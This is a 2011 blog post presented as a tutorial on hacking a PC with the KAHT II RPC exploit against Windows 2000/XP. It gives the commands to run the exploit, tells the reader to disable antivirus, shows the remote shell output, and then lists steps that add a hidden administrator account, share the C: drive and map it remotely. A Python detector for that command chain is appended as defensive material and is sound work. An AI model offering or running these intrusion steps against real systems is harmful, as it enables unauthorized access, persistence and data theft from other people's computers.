
Saturday 18 June 2011

Hacking a PC with an exploit

What is an exploit? It's a poorly coded piece of software which you can use to gain access to the system. There are many exploits available for the various MS Windows versions out there. Check this page for new exploits: http://www.frsirt.com/exploits/ or check the Windows Hacker exploit download page, which has compiled exploits.

Now if you're a n00b, you don't know how to compile an exploit; basically you need some programming experience, so go learn how to program. Most exploits are written in C++, so try Bloodshed Dev C++, which you can use to compile exploits.

Read this tutorial about compiling exploits.

But you can download exploits which other people have already compiled. If someone updates their PC when new exploits come out, you can't exploit them; but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how an exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is an exploit for Win2k/XP and it's already compiled; you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it:

1. Get the target IP and make sure it runs XP or 2k

2. Download the exploit tool
(make sure to deactivate your AV)

3. Run the exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 is the start of the range (the target address minus 1)

4. If successful, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. Now you have a shell on the target

6. Then you may add a user
C:\WINNT\system32>net user myuser mypassword /add
(myuser is the user name, mypassword is the password)

7. Add the user to the Administrators group
C:\WINNT\system32>net localgroup Administrators myuser /add
(localgroup targets a local group, Administrators is the group, myuser is the user)

8. Share the drive
C:\WINNT\system32>net share c=c:

9. Exit from the target, don't forget!
C:\WINNT\system32>exit

10. Use the shared drive: run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.
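As an added defensive example (not part of the original post), here is a small Python detector that scans process-creation audit lines for the post-exploitation chain steps 6 to 8 describe: a new local account, its addition to Administrators, then a shared drive root. The log line format, host names and sample entries are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample audit lines in a hypothetical format:
# "<timestamp> <host> <parent process> <command line>". Not real captured data.
SAMPLE_LOG = """\
2011-06-18T10:01:02 WKS01 cmd.exe net user myuser mypassword /add
2011-06-18T10:01:09 WKS01 cmd.exe net localgroup Administrators myuser /add
2011-06-18T10:01:15 WKS01 cmd.exe net share c=c:
2011-06-18T10:05:00 WKS02 cmd.exe net user alice
2011-06-18T10:06:00 WKS02 cmd.exe net localgroup Administrators
"""

# One pattern per step of the chain described in the write-up (steps 6, 7 and 8).
RE_USER_ADD = re.compile(r"^net\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)
RE_ADMIN_ADD = re.compile(r"^net\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
RE_SHARE_ROOT = re.compile(r"^net\s+share\s+\S+=([a-z]:)\\?\s*$", re.I)

def parse_line(line):
    """Split one audit line into (timestamp, host, parent, command line)."""
    ts, host, parent, cmd = line.split(maxsplit=3)
    return ts, host, parent, cmd

def detect_chain(log_text):
    """Return (host, timestamp, message) alerts when a freshly created local
    account is added to Administrators and a drive root is then shared."""
    state = defaultdict(lambda: {"created": set(), "admins": set()})
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, host, _parent, cmd = parse_line(raw)
        s = state[host]
        m = RE_USER_ADD.match(cmd)
        if m:  # step 6: local account created on this host
            s["created"].add(m.group(1).lower())
            continue
        m = RE_ADMIN_ADD.match(cmd)
        if m and m.group(1).lower() in s["created"]:  # step 7, on a new account
            s["admins"].add(m.group(1).lower())
            alerts.append((host, ts, f"new local account {m.group(1)} added to Administrators"))
            continue
        m = RE_SHARE_ROOT.match(cmd)
        if m and s["admins"]:  # step 8: drive root shared after the escalation
            alerts.append((host, ts, f"drive root {m.group(1)} shared after admin account creation"))
    return alerts
```

Only the host where all three steps occur on the same new account raises alerts; routine `net user` and `net localgroup` queries on the other host stay silent.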